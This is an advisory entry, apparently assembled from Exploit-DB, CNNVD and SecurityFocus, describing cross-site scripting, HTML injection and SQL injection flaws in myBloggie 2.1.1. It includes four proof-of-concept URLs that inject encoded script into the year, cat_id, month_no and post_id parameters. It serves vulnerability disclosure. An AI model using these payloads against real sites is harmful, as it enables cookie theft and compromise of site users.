https://www.exploit-db.com/exploits/25612
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-949

myBloggie2.1.1存在多个跨站脚本攻击(XSS)漏洞，远程攻击者可通过(1)在viewmode.php的year参数，或在index.php中的(2)cat_id，(3)month_no或(4)post_id参数(这些参数在系统显示错误信息之前未经正确审查)，注入任意Web脚本或HTML。

source: http://www.securityfocus.com/bid/13507/info

myBloggie is affected by multiple vulnerabilities.

An attacker may leverage these issues to carry out cross-site scripting, HTML injection and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks. The integrity of a site may be compromised by deleting arbitrary comments as well. 

Cross-site scripting:
http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert
(document.cookies)%3C/script%3E

HTML injection:
http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%
69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2
9%3C%2F%73%63%72%69%70%74%3EC

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63
%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%
65%29%3C%2F%73%63%72%69%70%74%3E

http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72%
69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2
9%3C%2F%73%63%72%69%70%74%3E

来源:XF
名称:mybloggie-script-injection(20436)
链接:http://xforce.iss.net/xforce/xfdb/20436
来源:XF
名称:mybloggie-viewmodephp-xss(20434)
链接:http://xforce.iss.net/xforce/xfdb/20434
来源:BID
名称:13507
链接:http://www.securityfocus.com/bid/13507
来源:BUGTRAQ
名称:20050505MultiplevulnerabilitiesinmyBloggie2.1.1
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111531904608224&w;=2